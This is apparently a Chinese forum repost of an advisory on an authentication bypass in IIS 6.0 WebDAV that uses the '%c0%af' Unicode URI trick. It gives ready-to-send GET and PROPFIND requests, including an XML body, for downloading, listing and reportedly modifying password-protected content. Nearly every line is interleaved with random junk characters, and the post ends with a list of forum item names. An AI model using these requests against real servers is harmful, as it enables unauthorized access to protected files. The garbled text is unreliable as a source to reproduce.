|
漏洞发现者:Nikolaos Rangos
3 A0 q1 ~5 Z0 T1 V具体漏洞存在于带WebDAV功能的IIS 6.0中7 A" }; ]. U; N
Web服务器没有正确地处理Unicode命令的URI时,解析和发送回的数据. & B. S4 y- n. _- o
假设有一个密码保护文件夹d:\inetpub\wwwroot\protected\ . Q5 g; b0 O7 D& H z% c
此文件夹内有一个名为 protected.zip "
, Q8 P+ J2 J$ ^向服务器发送一个HTTP GET请求. C3 }7 l" C' E5 s" i# Y. V
GET / %c0%af/protected/protected.zip HTTP/1.1
# p& x3 d* i, ^/ v, c Translate: f
4 R+ f- y$ Q, Q2 R/ Q Connection: close, w1 q# C6 ~$ l5 O( ~5 U
Host: servernameMu
6 ]! q B! ]4 F$ Q指示Web服务器处理请求使用 WebDAV的1 n+ C, E: b8 z/ S6 }/ @
利用这种恶意的URI构建网络服务器发送文件到
. B* j! }, E! B/protected/ protected.zip ”而不要求进行适当的验证
2 f# `* a+ T) l) b, o另一个有效的请求可能会传送到Web服务器是: GET /prot%c0%afected/protected.zip HTTP/1.1
/ z5 _- P8 q3 m& {& k Translate: f
% W6 w9 H% w$ ~ I6 z Connection: close
' C8 l" Y! H, h, u Host: servername4 Q% D2 _3 l2 _0 e% K& Z
IIS 6.0中将会删除„%c0%af” 的请求,并发送回密码保护文件而不验证.
; j( d5 p* H) ]7 ~* g' H; L" C: N# AASP脚本不能下载,除非以这种方式提供服务的脚本源代码是启用的 $ f# {& C c& p. H+ r9 ~, |
可以绕过访问限制的,密码保护文件夹和列表,下载,上传和修改文件
5 E. X# h4 I2 c* j6 FCopy code PROPFIND /protec%c0%afted/ HTTP/1.1
9 `; V9 `" I V) l' E3 I( d Host: servername
* B2 U4 q; ]! N2 _; h User-Agent: neo/0.12.2 6 C6 }4 o. B/ Q0 N- O0 w
Connection: TE ) D a. Q) l0 t0 M) `+ D. m1 R
TE: trailers
3 H, {* V% v. P" J L" L. i/ F Depth: 1 ) X# E1 n+ [9 e
Content-Length: 288
/ c5 m* {$ T2 T% q Content-Type: application/xml# O" t- k, O8 \ ~
<?xml version="1.0" encoding="utf-8"?>1 C9 m+ o1 W" h# q
<propfind xmlns="DAV:"><prop>
9 a; p- m) Y% i4 i <getcontentlength xmlns="DAV:"/>
" S* a {4 s1 U9 V <getlastmodified xmlns="DAV:"/>
, E: R. L$ e8 V# K6 X3 d4 } <executable xmlns="http://apache.org/dav/props/"/> 3 V# _! O/ n8 ?2 P
<resourcetype xmlns="DAV:"/>9 }6 [( O6 b5 o! ^1 W' T ~5 H
<checked-in xmlns="DAV:"/>
8 m; Y1 T$ d4 K) y <checked-out xmlns="DAV:"/>/ ~3 Y# r7 J) p) B
</prop></propfind> IIS的回应的目录列表的文件夹中没有要求输入密码
; H( F/ u6 S& b3 u |
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
